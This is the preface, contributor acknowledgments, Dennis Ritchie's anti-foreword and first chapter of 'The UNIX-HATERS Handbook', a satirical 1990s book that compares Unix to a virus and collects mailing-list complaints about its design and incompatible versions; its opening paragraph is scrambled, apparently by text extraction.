The UNIX-HATERS History The year was 1987. maybe you will just stop using Unix entirely. Our rationality could not upset its chaos. Some are inspired. it was invulnerable to planned attack. some depressing. some are vulgar. Few are hopeful. we poked and prodded into every crevice. the notes served as morale boosters. This book is about people who are in abusive relationships with Unix. This book won’t improve your Unix skills. we discovered that our prison had no coherent design. a graduate student at the MIT Media Laboratory. and our messages became defeatist. We started passing notes to each other. documenting the chaos and lossage. To our horror. If you are lucky. was taking his first steps into the future.xxii Preface Our story started when the economics of computing began marching us. At first. go read a Unix how-to book or some sales brochures. Because it had no strong points. no rational basis. one by one. frequently using black humor based upon our observations. of depravation and humiliations. they spoke of cultural isolation. woven around the threads in the UNIX-HATERS mailing list. and Michael Travers. As time passed. just as prisoners who plot their escape must understand the structure of the prison better than their captors do. For years Travers had written large and beautiful programs at the console of his Sym- . of primitive rites and rituals that we thought belonged only to myth and fantasy. These notes are not always pretty to read. If you want the other side of the story. Finally. into the Unix Gulag.
the Media Lab had decided to purge its LispMs. John had recently been forced to give up a Lisp Machine for a computer running Unix. The VAX ran Unix. a programmer at a well-known Massachusetts computer manufacturer (whose lawyers have promised not to sue us if we don’t print the company’s name). Michael Travers decided to create a new list. Like Michael. one of two stateof-the-art AI workstations at the Lab. such as ITS-LOVERS. These lists are for experts. If you are not in fact a Unix hater. a mailing list for surly folk who have difficulty accepting the latest in operating system technology. If Travers wanted to continue doing research at MIT. MIT has a long tradition of mailing lists devoted to particular operating systems. let me know and I’ll remove you. But it was all coming to an end. 1 Oct 87 13:13:41 EDT Michael Travers <mt> UNIX-HATERS Welcome to UNIX-HATERS In the tradition of TWENEX-HATERS. he discovered.The UNIX-HATERS History xxiii bolics Lisp Machine (affectionately known as a LispM). which was organized for programmers and users of the MIT Artificial Intelligence Laboratory’s Incompatible Timesharing System. he would have to use the Lab’s VAX mainframe. Frustrated after a week of lost work. The first letter that Michael sent to UNIX-HATERS included a well-reasoned rant about Suns written by another new member of the Unix Gulag: John Rose. Please add other people you think need emotional outlets for their frustration. for people who can—and have—written their own operating systems. He called it UNIXHATERS: Date: From: To: Subject: Thu. In the interest of cost and efficiency. These are lists for systems hackers. he sent this message to his company’s internal support mailing list: .
and expecting you to tell it how to proceed? Well. For example. it closes right up. documentation strings. because my Sun’s editor window evaporated in front of my eyes. just for good measure. You have no idea how useful this is: there’s an editor command called “meta-point” that immediately transfers you to the source of any function. (Did I feel a draft?) This simplicity greatly decreases debugging time because you immediately give up all hope of finding the problem.xxiv Preface Date: From: To: Fri. Go ahead. . When a LispM loads code into its memory. and sometimes an interpreted definition. what’s good and bad about Suns? This is the fifth day I’ve used a Sun. 27 Feb 87 21:39:24 EST John Rose sun-users. ANY function. the names of all macros expanded to produce its code. hairy debugger with the confusing backtrace display. at this point. In fact. each function also remembers which file it was defined in. You know how a LispM is always jumping into that awful. it’s also the fifth time my Emacs has given up the ghost. I’ve got a spare minute here. without breaking your stride. It’s inspiring to those of us whose LispMs take all morning to boot. you can just boot. Coincidentally. it loads a lot of debugging information too. What could be easier? If there’s a window involved. and just restart from the beginning whatever complex task you were up to. taking with it a day’s worth of Emacs state. if you haven’t already. systems Pros and Cons of Suns Well. there’s a key that causes the calling sequence of a function to be displayed instantly. the question naturally arises. Likewise. not just one of a special predetermined set. So. it’s fast! One reason Suns boot fast is that they boot less. You ought to see one boot. Suns ALWAYS know how to proceed. They dump a core file and kill the offending process. Oh. Another nice thing about Suns is their simplicity. So I think I’m getting a feel for what’s good about Suns. One neat thing about Suns is that they really boot fast. each function records the names of its arguments and local variables.
What used to take five seconds now takes a minute or two. Lisp Machines share code this way. too. and then regenerate the application from the source. but it is completely frustrated. I really want to see the Sun at its best. Finally I have to search inside the file. There’s a wonderful Unix command called “strip. Pretty soon Emacs starts to say things like “Memory exhausted” and “Segmentation violation. but what’s an order of magnitude between friends?) Ok. I have to switch to a shell window and grep for named Foo in various files.” with which you force programs to remove all their debugging information. Then I have to correct my spelling error. (But what’s an order of magnitude between friends?) By this time. But I sure wanted my Sun’s mouse to talk to Emacs. my Meta-Point reflex has continued unabated. because all the debugging information takes up disk space and slows down the booting process. I remember similar hacks to the LispM terminal program to make it work with Emacs. If I want to edit the code of a function Foo. so I run my Emacs-with-mice program. (It also took less work than those aforementioned couple hundred lines of code. so I’m tempted to boot it a couple of times. happily mousing away. Then I have to type in the name of the appropriate file.The UNIX-HATERS History xxv Logged into a Sun for the last few days.” . This means you can’t use the debugger on them. and link with the very same code that is shared by all the standard Sun window applications (“tools”). core dumped. It took about 20 lines of Lisp code. Unix programs (such as the Sun window system) are stripped as a matter of course. But that’s no loss. Isn’t it nice that our workstations protect our memory investments by sharing code. Unix applications cannot be patched either. The program that I am working on has about 80 files. have you seen the Unix debugger? Really. Presto! Emacs gets mice! Just like the LispM. you must have the source so you can patch THAT.” The little Unix console is consoling itself with messages like “clntudp_create: out of memory. None of the standard Sun window applications (“tools”) support Emacs. So I got a couple hundred lines of code (from GNU source) to compile. Did you know that all the standard Sun window applications (“tools”) are really one massive 3/4 megabyte binary? This allows the tools to share code (there’s a lot of code in there).
I created another massive 3/4 megabyte binary.) The Sun kernel was just plain running out of room. which doesn’t share space with the standard Sun window applications (“tools”). Or programmer apathy. Every trivial hack you make to the window system replicates the entire window system. reclaiming its own garbage. Such a workstation could stay up for days. but it’s understandable that a little garbage escapes now and then because of programmer oversight. the console just complained about the lack of memory again. So eventually the swap volume fills up! This leads me to daydream about a workstation architecture optimized for the creation and manipulation of large. to send mouse clicks to Emacs. Or incremental testing of programs. Gosh. there isn’t time to talk about the other LispM features I’ve been free of for the last week. Moreover.xxvi Preface Eventually my Emacs window decides it’s time to close up for the day. You are supposed to call “free” on every structure you have allocated. and some magic means of freeing storage without programmer intervention. I suppose. interconnected data structures. (Emacs itself is a third large mass. But. So I paid a megabyte of swap space for the privilege of using a mouse with my editor. There are some network things with truly stupendous-sized data segments. without need for costly booting operations. This means that instead of one huge mass of shared object code running the window system. I had two such huge masses. Or a window system you can actually teach new things (I miss my . identical except for a few pages of code. That’s why I’m glad Suns are easy to boot! But why should a network server grow over time? You’ve got to realize that the Sun software dynamically allocates very complex data structures. and taking up space on my paging disk. apparently. Such as incremental recompilation and loading. just to let you know they’re in peak form! Well. What has happened? Two things. of course. Suns are very good at booting! So good. complex. from a Lisp Listener. eventually taking over the entire swap volume. they grow over time. But that’s not all: Apparently there are other behemoths of the swap volume. they sometimes spontaneously boot. One is that when I created my custom patch to the window system. So you can’t leave a Sun up for very long.
Somehow it was forwarded to Michael Travers at the Media Lab. now that we know better. it’s better than DOS. worse. or.] Some disclaimer. Our grievance is not just against Unix itself. worse. In terms of raw CPU power. Unfortunately. John Rose included this disclaimer: [Seriously folks: I’m doing my best to get our money’s worth out of this box. but against the cult of Unix zealots who defend and nurture it. because this disappearing editor act is really getting my dander up. Time to boot! John Rose sent his email message to an internal company mailing list. In particular. a “rite of passage. John didn’t know that Michael was going to create a mailing list for himself and his fellow Unix-hating friends and e-mail it out. and pesti- . Or manuals. seven years later. disease. John is still on UNIX-HATERS. You may have deleted important files and gone for help. We aim to show that you are not alone and that your problems with Unix are not your fault. and there are solutions to some of the above problems. They take the heat. But what they saved in hardware costs they soon spent (and continue to spend) many times over in terms of higher costs for support and lost programmer productivity. But I needed to let off some steam. Or safe tagged architecture that rigidly distinguishes between pointers and integers. a Sun can really get jobs done fast. But Michael did and. it is too late. Or the Control-MetaSuspend key.The UNIX-HATERS History xxvii mouse-sensitive Lisp forms). along with hundreds of other people. The company in question had bought its Unix workstations to save money. you have probably had the same nightmarish experiences that we have had and heard. Or is it? You are not alone If you have ever used a Unix system. only to have it lost in a mailer burp.” You may have spent hours writing a heart-wrenching letter to a friend. Most think of Unix as a pretty good operating system. have it sent to somebody else. thanks to Bill for increasing my swap space. or. After all. Lisp Machines are a fading memory at the company: everybody uses Unix. only to be told that it was your own fault. At the end of flame.
and. a journalist and computer science researcher. some self-inflicted. and that science. is the path to useful and friendly technology. While at his cushy academic job. Steven Strassmann. as ancient shamans did. active baby boy have become his priorities. Simson is also the co-author of Practical Unix Security (O’Reilly and Associates. not religion. display their wounds.D. footnote. In addition to initial editing. Daniel had time to work on this project. as proof of their power and wizardry. 1993). crawling.xxviii Preface lence as givens.D. Steven received his Ph. the editors culled through six years’ archives of the UNIX-HATERS mailing list. Daniel received his Ph.D. a researcher at Microsoft’s research laboratory. Contributors and Acknowledgments To write this book. a senior scientist at Apple Computer. Simson wrote the chapters on Documentation. In addition to his duties as editor. Simson received three undergraduate degrees from the Massachusetts Institute of Technology and a Master’s degree in journalism from Columbia University. to show them that they pray to a tin god. Daniel wrote large portions of Welcome. Daniel Weise. He would be in graduate school working on his Ph. and Security. from the Massachusetts Institute of Technology’s Media Labora- . 1991) and NeXTSTEP Programming (Springer-Verlag. New User. the Unix File System. now. and Terminal Insanity. Computer science would have progressed much further and faster if all of the time and effort that has been spent maintaining and nurturing Unix had been spent on a sounder operating system. Around these messages are chapters written by UNIX-HATERS experts who felt compelled to contribute to this exposé. albeit costly. Since leaving Stanford for the rainy shores of Lake Washington. We hope that one day Unix will be relinquished to the history books and museums of computer science as an interesting. Mail. Networking. through bluntness and humor. We aim. We are: Simson Garfinkel. and Master’s degrees from the Massachusetts Institute of Technology’s Artificial Intelligence Laboratory and was an assistant professor at Stanford University’s Department of Electrical Engineering until deciding to enter the real world of DOS and Windows. but this book came up and it seemed like more fun. These contributors are referenced in each included message and are indexed in the rear of the volume. a challenging new job and a bouncing.
a specialist on operating systems who hopes to have his Ph. or window systems getting in the way of things. compilers. the author of Zeta C. an Apple Fellow at Apple Computer. Scott wrote most of the chapter on C++. we asked Dennis to write our Anti-Foreword. a seasoned user interface designer and graphics programmer. Don has worked at UniPress Software.” as well as the plural on the word “Windows. (To annoy X fanatics. Mark wrote the chapter on System Administration. Mark was a systems programmer on TOPS-20 systems for eight years.” in his chapter title. Frustrated by Unix. Scott Burson. He ported SimCity to NeWS and X11 for DUX Software. from Carnegie Mellon University by the time this book is published. He now works for Kaleida. Sun Microsystems. Donald Norman. He and Ken Thompson are considered by many to be the fathers of Unix. San Diego. John Klossner. He instigated this book in 1992 with a call to arms on the UNIX-HATERS mailing list. Inc. Don wrote the chapter on the X-Windows Disaster. he now programs microcontrollers in assembler. He is the author of more than 12 books including The Design of Everyday Things. the Turing Institute. Christopher Maeda. Christopher wrote most of the chapter on Programming.D. the first C compiler for the Lisp Machine. shells. who has actively hated Unix since his first Usenix conference in 1984. John enjoys public transportation. . Head of the Computing Techniques Research Department at AT&T Bell Laboratories. He’s currently working on Apple’s Dylan development environment. In his spare time. Dennis Ritchie. then spent a few years of doing Unix system administration. a Cambridge-based cartoonist whose work can be found littering the greater northeastern United States. In the interest of fairness. and Carnegie Mellon University. where he doesn’t have to worry about operating systems. Don specifically asked that we include the hyphen after the letter “X.Contributors and Acknowledgments xxix tory and is an expert on teaching good manners to computers. These days he makes his living hacking C++ as a consultant in Silicon Valley.) Mark Lottor. and a Professor Emeritus at the University of California. Don received a BSCS degree from the University of Maryland while working as a researcher at the Human Computer Interaction Lab. Don Hopkins.
Michael Cohen. and Laura Yedwab. Eric Raymond. Tom Knight. Matt paired us up with Christopher Williams at IDG Programmers Press. during his multiyear tenure as moderator of comp. and Jamie Zawinski. Richard Mlynarik. Michael Tiemann. Strata Rose. Christopher Stacy. we have used and frequently incorporated messages from Phil Agre. Simson Garfinkel. and Andy Watson. Jonathan Rees. Dunning. We received advice and support from many people whose words do not appear here. David Vinayak Wallace. Chris Garrigues. Dave Mankins.sources. Cliff Stoll. Kurt. Stanley’s Tool Works. Mark Friedman. Alan Borning. Rob Austein. Foner. Kent M. Rich has been active on the Usenet for many years. He also bears responsibility for InterNetNews. Dave Mankins. but both times left school rather than serve out his term. Paul Rubin. Dan Ruby. Michael Ernst. Judy Anderson. Pitman.. Michael Travers David Waitzman. The Unix Barf Bag was inspired by Kurt Schmucker. Olin Shivers. Robert E. More importantly. Patton. Ken Harrenstien. Brown. where he works on the Distributed Computing Environment. including Beth Rosenberg. David Weise. Rich wrote the Snoozenet chapter. Phil Agre. Alexander Shulgin. Ian D. Dan Weinreb.unix he set the defacto standards for Usenet source distribution still in use. John R. Phil Budne. Len Tower Jr.xxx Preface Rich Salz is a Principal Software Engineer at the Open Software Foundation. M. Seastrom. He was still interested more than a year later when Simson took over the project from Daniel. Robbins. Reuven Lerner. Many people read and commented on various drafts of this manuscript. M. Matt immediately gravitated to this book in May 1992. then passed us on to Trudy . Gail Zacharias. Thanks. John Wroclawski. Stephen E. Horswill. Miriam Tucker. Robert Krajewski. Don Hopkins. David H. A special thanks to all of you for making many corrections and suggestions. Michael A. James Lee Johnson. Alan Bawden. David Chapman. Strata Rose. Pavel Curtis. one of the most virulent NNTP implementations of Usenet. Jerry Leichter. We would especially like to thank Matthew Wagner at Waterside Productions. he was twice elected editor-in-chief of his college newspaper. Steve Strassmann. Michael Travers. Regina C. Nick Papadakis. Leonard N. Daniel Weise. Jim McDonald. Chris signed us up without hesitation. We would especially like to thank Judy Anderson. Bruce Howard. Jim Davis. In producing this book. Greg Anderson. The Tech. Patrick Sobalvarro. and finding our typos. Kaufman. a world-class C++ hater and designer of the infamous C++ barf bag. David Waitzman. Dave Hitz.
Amy Pedersen was our Imprint Manager. pic. or any other idiotic Unix acronym. tbl. it was typeset using FrameMaker on a Macintosh. That’s it. We’ve tried to put command names. who saw the project through to its completion. ick. This book was typeset without the aid of troff. and the names of Unix system functions in italics. The UNIX-HATERS cover was illustrated by Ken Copfelt of The Stock Illustration Source. There’s also a courier font used for computer output.Typographical Conventions xxxi Neuhaus. In fact. eqn. in bold. and we make it bold for information typed by the user. Typographical Conventions In this book. We hate computer manuals that look like they were unearthed with the rest of King Tut’s sacred artifacts. This isn’t an unreadable and obscure computer manual with ten different fonts in five different styles. where they appear. we use this roman font for most of the text and a different sans serif font for the horror stories from the UNIX-HATERS mailing list. yuc. . and a NeXTstation. a Windows box.
And others. we’ll issue a prompt apology. and that have no compunctions against suing innocent universities. so some of the more superficial problems we document in this book might not appear in a particular version of Unix from a particular supplier. If you can prove that no version of Unix currently in use by some innocent victim isn’t riddled with any of the problems that we mention in this volume. . • Unix haters are everywhere. lest they sic an idle lawyer on us: • It might be the case that every once in a while these companies allow a programmer to fix a bug rather than apply for a patent. • Inaccuracies may have crept into our narrative. we had better set a few things straight. We are in the universities and the corporations. We’ve already got that memo. Our spies have been at work collecting embarrassing electronic memoranda. That doesn’t really matter. We don’t need the discovery phase of litigation to find the memo calculating that keeping the gas tank where it is will save $35 million annually at the cost of just eight lives. Don’t take our word for gospel for a particular flaw without checking your local Unix implementation. since that same supplier probably introduced a dozen other bugs making the fix. despite our best intentions to keep them out.xxxii Preface The UNIX-HATERS Disclaimer In these days of large immoral corporations that compete on the basis of superior software patents rather than superior software.
The UNIX-HATERS Disclaimer xxxiii .
.
The systems you remember so fondly (TOPS-20. Cedar/Mesa. and malnourishment. the Dorado) are not just out to pasture. creates order from chaos: instead. if it has no strong places? The rational prisoner exploits the weak places. How can this be. 15 Mar 1994 00:38:07 EST Subject: anti-foreword To the contributers to this book: I have succumbed to the temptation you offered in your preface: I do write you off as envious malcontents and romantic keepers of memories.Anti-Foreword By Dennis Ritchie From: dmr@plan9. Yet your prison without coherent design continues to imprison you. Your judgments are not keen. In the Preface you suffer first from heat. lice. Lisp Machine.att. Multics. collectives like the FSF vindicate their jailers by building cells almost com- . they are fertilizing it from below. they are intoxicated by metaphor. ITS. then become prisoners in a Gulag.com Date: Tue.research. In Chapter 1 you are in turn infected by a virus. racked by drug addiction. and addled by puffiness of the genome.
other times you want something different. Your sense of the possible is in no sense pure: sometimes you want the same thing you have. sometimes one wonders why you just don't shut up and tell people to buy a PC with Windows or a Mac. Like excrement. albeit with more features.xxxvi Anti-Foreword patible with the existing ones. Bon appetit! . many well-conceived. and the senior scientist at Apple might volunteer a few words about the regulations of the prisons to which they have been transferred. just a future whose intellectual tone and interaction style is set by Sonic the Hedgehog. but wish you had done it yourselves. But it is not a tasty pie: it reeks too much of contempt and of envy. Here is my metaphor: your book is a pudding stuffed with apposite observations. the researcher at Microsoft. No Gulag or lice. it contains enough undigested nuggets of nutrition to sustain life for some. but can't seem to get people to use it. You claim to seek progress. The journalist with three undergraduate degrees from MIT. but you succeed mainly in whining.
xxxvii .
.
Part 1: User Friendly? .
.
Occasionally. the virulence goes way up. Most of the time they are nothing more than a minor annoyance—unavoidable. metabolism. I don’t think that this is a coincidence. they only have enough DNA or RNA to get themselves replicated.1 Unix The World’s First Computer Virus “Two of the most famous products of Berkeley are LSD and Unix. yet it successfully mutates into a new strain about every other flu season. For example. Some folks debate whether viruses are living creatures or just pieces of destructive nucleoic acid and protein. so they don't need to be very big. and locomotion. . and the resulting epidemic kills a few million people whose immune systems aren’t nimble enough to kill the invader before it kills them. They aren’t very complex: rather than carry around the baggage necessary for arcane tasks like respiration. any particular influenza strain is many times smaller than the cells it infects. The features of a good virus are: • Small Size Viruses don’t do very much. yet ubiquitous.” —Anonymous Viruses compete by being as small and as adaptable as possible.
even more. the idea was to develop a single computer system that would be as reliable as an electrical power plant: providing nonstop computational resources to hundreds or thousands of people. it would have been Unix. it regularly panics. History of the Plague The roots of the Unix plague go back to the 1960s. et cetera. memory banks. In its original incarnation. Because it lacked features that would make it a real operating system (such as memory mapped files. high-speed input/output. and halts. Evidence indicates that the AIDS virus may have started as a simian virus. and the Massachusetts Institute of Technology embarked on a project to develop a new kind of computer system called an “information utility. General Electric. and with a few changes. Unix is a computer virus with a user interface. without a system administrator baby-sitting Unix. Minimality of design was paramount.4 Unix • Portability A single virus can invade many different types of cells. file. but differ just enough to confuse the host's defense mechanisms. If Andromeda Strain had been software.” Heavily funded by the Department of Defense’s Advanced Research Projects Agency (then known as ARPA). Unix feeds off the energy of its host. ad nauseam). it was portable. The information utility would be equipped with redundant central processor units. it was very small and had few features. rational interprocess communication. Unix frequently mutates: kludges and fixes to make one version behave won't work on another version. the virus would die. when American Telephone and Telegraph. so that one could be serviced while others remained running. • Ability to Commandeer Resources of the Host If the host didn’t provide the virus with safe haven and energy for replication. • Rapid Mutation Viruses mutate frequently into many different forms. The system was designed to have the highest level of computer . record. These forms share common structure. and input/ output processors. a robust file system. Unix possesses all the hallmarks of a highly successful virus. and device locking. dumps core. Animal and primate viruses often mutate to attack humans. A more functional operating system would have been less portable.
Thompson and his friends retired to writing (and playing) a game called Space Travel on a PDP-7 computer that was sitting unused in a corner of their laboratory. Thompson and Ritchie had no protection. and to help them communicate. Researchers at Columbia University learned of Unix and contacted Ritchie for a copy. At first. They bought a PDP-11/20 (by then Unix had mutated and spread to a second host) and became the first willing victims of the strain. It was built like a tank. Unix had spread to 25 different systems within the research lab. the project was behind schedule and AT&T got cold feet: it pulled the plug on its participation. Like scientists working on germ warfare weapons (another ARPA-funded project from the same time period). Dennis Ritchie. Thus Unix was brewed. Its goal was even there in its name: Multics. As it happened. they saw their role as an evangelizers. After the programmers tried unsuccessfully to get management to purchase a DEC System 10 (a powerful timesharing computer with a sophisticated. Using Multics felt like driving one. rather than practice containment. All to play Space Travel. the Unix infection was restricted to a few select groups inside Bell Labs. interactive operating system). But unlike the germ warfare experimenters. and then they actually started sending it out. to be used by many different people at once. and minimal kernel for the PDP-7. Multics was designed to store and retrieve large data sets. file system. Thompson used Bell Labs’ GE645 to cross-compile the Space Travel program for the PDP-7. the early Unix researchers didn’t realize the full implications of their actions. But in 1969. But soon—rationalizing that it would be faster to write an operating system for the PDP-7 than developing Space War on the comfortable environment of the GE645—Thompson had written an assembler. It likewise protected its users from external attack as well. Unix had escaped. so that the actions of one user could not affect another. Thompson and company innocently wrote a few pages they called documentation. At first. By 1973. short for MULTiplexed Information and Computer System. The Multics project eventually achieved all of its goals. leaving three of its researchers—Ken Thompson. Indeed. .History of the Plague 5 security. Before anybody realized what was happening. and Joseph Ossanna—with some unexpected time on their hands. the Lab’s patent office needed a system for text processing. and AT&T was forced to create the Unix Systems Group for internal support.
and used computer sellers. even though few Unix users even know what these machines look like. they got screwed when they got it. simple design. There would be smiles. By 1993. only a handful— Digital. Accumulation of Random Genetic Material Chromosomes accumulate random genetic material. I would sometimes compare Unix to herpes—lots of people have it. they would get rid of it. I was often asked about Unix. HP—resisted Unix. the VAX. This is not true. Symbolics was in Chapter 11 and Apollo had been purchased (by HP). and if they could. Of the at least 20 commercial workstation manufacturers that sprouted or already existed at the time (late 1970s to early 1980s). For example. (The Sun was in fact designed to be a virus vector. the rest describes orangutans.) As one DEC employee put it: From: To: Subj: CLOSET::E::PETER 29-SEP-1989 09:43:26. and that would usually end the discussion about Unix. heads would nod.6 Unix Literature avers that Unix succeeded because of its technical superiority. new mutants. Its sole evolutionary advantage was its small size. . Later it became popular and commercially successful because it piggy-backed on three very successful hosts: the PDP-11. Symbolics. this material gets happily and haphazardly copied and passed down the generations. Unix was evolutionarily superior to its competitors. the original evolutionary pressures on Unix have been relaxed. we may discover that only a few percent of it actually describes functioning humans. it’s hard to find a version of Unix that doesn’t contain drivers for a Linotronic or Imagen typesetter. The remaining companies are now firmly committed to Unix. Unix became a commercial success because it was a virus. Despite its small beginnings. and Sun workstations. and the strain has gone wild. Apollo. Unix accumulated junk genomes at a tremendous pace. Once the human genome is fully mapped. The same is true of Unix. As Olin Shivers observes. but not technically superior. nobody wants it. If the audience was not mixed gender.63 closet::t_parmenter Unix In a previous job selling Lisp Machines. and resulting portability. televangelists.
The next paragraph goes on to say: .3. describes how inferior genes survive and mutate in Unix’s network code (paragraph 3): Despite minor improvements over its predecessors. of an excellent book on networking called Internetworking with TCP/IP by Douglas Comer. Thus. they are dutifully copied from generation to generation. It didn’t have to be good.cmu. it has resulted because Berkeley distributed routed software along with the popular 4.cs. many Internet sites adopted and installed routed and started using RIP without even considering its technical merits or limitations. with second and third cousins resembling each other about as much as Woody Allen resembles Michael Jordan. Of course. address spaces move from 16 to 32 bits. memory gets cheaper. or even correct. In the early PDP-11 days. Unix programs had the following design parameters: Rule 1.edu> UNIX-HATERS Unix evolution I was giving some thought to the general evolution (I use the term loosely. Instead. “Routing Information Protocol (RIP).soar. It had to be small. Thus the toolkit approach. and so forth. For example. So Rule 2 has been relaxed.History of the Plague 7 Date: From: To: Subject: Wed. 10 Apr 91 08:31:33 EDT Olin Shivers <shivers@bronto. here) of Unix since its inception at Bell Labs. over time. This behavior has been noted in several books. but: Rule 2. the popularity of RIP as an IGP does not arise from its technical merits. computer hardware has become progressively more powerful: processors speed up. The additional genetic material continues to mutate as the virus spreads.” page 183. and I think it could be described as follows. and so forth. It really doesn’t matter how the genes got there. Section 15.X BSD UNIX systems.
Unix simultaneously exhibits its mixed and dated heritage. Just like a virus. but they are very successful. at no cost. Beatles-era two-letter command names. and systems programs (for example. Sex. Drugs. . and not on the side of correctness. or completeness. Gabriel. weren’t “free.8 Unix Perhaps the most startling fact about RIP is that it was built and widely distributed with no formal standard. It was cheap. Like a classics radio station whose play list spans decades. and Scott Joplin-era core dumps. Others have noticed that Unix is evolutionarily superior to its competition. Researchers and students got a better high from Unix than any other OS. with interoperability limited by the programmer’s understanding of undocumented details and subtleties.” expounds on this theme (see Appendix A). AT&T gave away free samples of Unix to university types during the 1970s. Like any good drug dealer. and Unix While Unix spread like a virus.” or weren’t yet out of the labs that were busily synthesizing them. consistency. A comforting thought. Better operating systems that would soon be competing with Unix either required hardware that universities couldn’t afford. its adoption by so many can only be described by another metaphor: that of a designer drug. in fact. rather than technically superior. Richard P. ps) whose terse and obscure output was designed for slow teletypes. He calls this the “Worse Is Better” philosophy and shows how it yields programs that are technically inferior to programs designed where correctness and consistency are paramount. dependent on Unix. Most implementations have been derived from the Berkeley code. more problems arise. scads of freshly minted Unix hackers that were psychologically. it was malleable. There’s Clash-era graphics interfaces. Bing Crosby-era command editing (# and @ are still the default line editing commands). to anything else they could obtain. for their needs. You will probably die from one. in his essay “The Rise of Worse-is-Better. if not chemically. AT&T’s policy produced. As new versions appear. And it was superior. it ran on relatively inexpensive hardware. There’s nothing elegant about viruses. but that are evolutionarily superior because they port more easily. His thesis is that the Unix design philosophy requires that all design decisions err on the side of implementation simplicity.
they thought: Unix was better than what they had. They were willing to make a few sacrifices. because it was portable. Did users want the OS without automatic command completion? No. These programmers were capable of jury-rigging (sometimes called “porting”) Unix onto different platforms. Unix was written into Sun's business plan. For these workstation manufacturers. Users said that they wanted Unix because it was better than the “stone knives and bear skins” FORTRAN and Cobol development environments that they had been using for three decades. Did users want the cheapest workstation money could buy that supported a compiler and linker? Absolutely. Virtually all of them used Unix.Standardizing Unconformity 9 When the Motorola 68000 microprocessor appeared. Did users want the only OS without intelligent typeahead? Indeed not. It didn’t really matter. Did users want the OS without memory mapped files? No. Did users want the operating system with a terrible tool set? Probably not. even though DEC wouldn’t support it. Sun Microsystems became the success it is today because it produced the cheapest workstations.” —Grace Murray Hopper . Did users want the operating system where bugs didn’t get fixed? Not likely. dozens of workstation companies sprouted. Standardizing Unconformity “The wonderful thing about standards is that there are so many of them to choose from. High-quality OSs required too much computing power to support. and customers got what they paid for. But in chosing Unix. and because Unix hackers that had no other way to get their fixes were readily and cheaply available. choice was Unix. accomplished Unix hackers were among the founders. they unknowingly ignored years of research on operating systems that would have done a far better job of solving their problems. Did users want the OS that couldn’t stay up more than a few days (sometimes hours) at a time? Nope. Did users really want the OS with a terrible and dangerous user interface? No way. Very few had significant O/S expertise. not because they were the best or provided the best price/performance. the economic choice was Unix. one quarter of the VAX installations in the United States were running Unix. By 1984. according to DEC’s own figures. So the economical. not technical.
but there is always the risk that the critical applications the customer needs won’t be supported on the particular flavor of Unix that the customer has purchased. both of these reasons are the very same reasons that workstation companies like Sun. Unix giants like Sun. If every Sun. The second reason that customers want compatible versions of Unix is that they mistakenly believe that software compatibility will force hardware vendors to compete on price and performance. and DEC really don’t want a unified version of Unix. in the final analysis..com UNIX-HATERS Unix names Perhaps keeping track of the different names for various versions of Unix is not a problem for most people. Although it often seems that this effort plays itself out in press releases and not on programmers’ screens. Sure. switching to Unix has simply meant moving to a new proprietary system—a system that happens to be a proprietary version of Unix. Of course. It’s all kind of ironic. and DEC have in fact thrown millions of dollars at the problem—a problem largely of their own making. and DEC workstation runs the same software.10 Unix Ever since Unix got popular in the 1980s. Why Unix Vendors Really Don’t Want a Standard Unix The push for a unified Unix has come largely from customers who see the plethora of Unixes. HP. but today the copy editor here . find it all too complicated. customers would rather buy a similarly priced workstation and run a “real” operating system (which they have been deluded into believing means Unix). One of the reasons that these customers turn to Unix is the promise of “open systems” that they can use to replace their proprietary mainframes and minis. Yet. IBM. HP. there has been an ongoing effort on the part of the Unix vendors to “standardize” the operating system. IBM. and end up buying a PC clone and running Microsoft Windows. IBM. eventually resulting in lower workstation prices. 20 Nov 91 09:37:23 PST simsong@nextworld. HP. Date: From: To: Subject: Wed.
but they were prevented from doing so by AT&T’s lawyers.Standardizing Unconformity 11 at NeXTWORLD asked me what the difference was between AIX and A/UX. These days.symbolics. they say that they want to make their own trademarked version of Unix just a little bit better than their competitors: add a few more features. Date: Tue.] . meanwhile. Dunning <jrd@stony-brook. 8 May 90 14:57:43 EDT From: Noel Chiappa <jnc@allspice.com> jnc@allspice.lcs.scrc. and provide better administrative tools. 13 May 90 16:06 EDT John R. It’s hard to resist being tough on the vendors.mit. in one breath they say that they want to offer users and developers a common Unix environment. UNIX-HATERS Unix: the last word in incompatibility. DEC calls its system ULTRIX. It isn’t that they’re trying to avoid a lawsuit: what they are really trying to do is draw a distinction between their new and improved Unix and all of the other versions of Unix that merely satisfy the industry standards. and you can jack up the price. most vendors wouldn’t use the U-word if they had a choice.edu> [. many vendors wanted to use the word “Unix” to describe their products. “AIX is Unix from IBM. who thought that the word “Unix” was some kind of valuable registered trademark. however. Anybody who thinks that the truth lies somewhere in between is having the wool pulled over their eyes. They’re both AT&T System V with gratuitous changes. calls their version of Unix (which is really Mach with brain-dead Unix wrapped around it) NEXTSTEP. In the next breath. Vendors picked names like VENIX and ULTRIX to avoid the possibility of a lawsuit. A/UX is Unix from Apple. And don’t forget Xenix—that’s from SCO.. “I’m not sure.” NeXT. DGUX is Data General’s. After all.” “What’s the difference?” he asked..edu. Date: From: To: Subject: Sun.lcs.mit. But it’s impossible to get a definition of NEXTSTEP: is it the window system? Objective-C? The environment? Mach? What? Originally. Then there’s HP-UX which is HP’s version of System V with gratuitous changes. improve functionality.
an engineer in Alcoa Laboratories’ Applied Mathematics and Computer Technology Division. And gee. you have to roll your own. look at that: A bug in the Xenix compiler prevents you from using byte-sized frobs here. I think that’s right.12 Unix I think Unix and snowflakes are the only two classes of objects in the universe in which no two instances ever match exactly. what’s the big deal?” I don’t know if there’s a moral to this story. They were using some kind of Unix on a PDP-11 for development and planning to sell it with a board to OEMs. Ad nauseam. Venix’s pseudo real-time facilities don’t work at all. criticized the entire notion of the word . I had a job at a software outfit that was building a large graphical user-interface sort of application. The evaluation process consisted largely of trying to get their test program. I don’t remember the details of which variants had which problems. a few fake library interface functions there. Well. Pete Schilling. I was impressed that a family of operating systems that claimed to be compatible would exhibit this class of lossage. when I was being a consultant for a living. one vendor changed all the argument order around on this class of system functions. but the result was that no two of the five that I tried were compatible for anything more than trivial programs! I was shocked. other than one should never trust anything related to Unix to be compatible with any other thing related to Unix. a few #ifdefs here. running on various multibus-like hardware. Piece of cake. and it reminded me of another story. And oh yeah. to compile and run on the various *nixes. what do you know. But the thing that really got me was that none of this was surprising to the other *nix hackers there! Their attitude was something to the effect of “Well. But oops. I had the job of evaluating various Unix variants. which was an early prototype of the product. sez I. The claim was that doing so was the only thing that let them get the stuff out the door at all! In a 1989 posting to the Peter Neumann’s RISKS mailing list. I heard some time later that the software outfit in question ran two 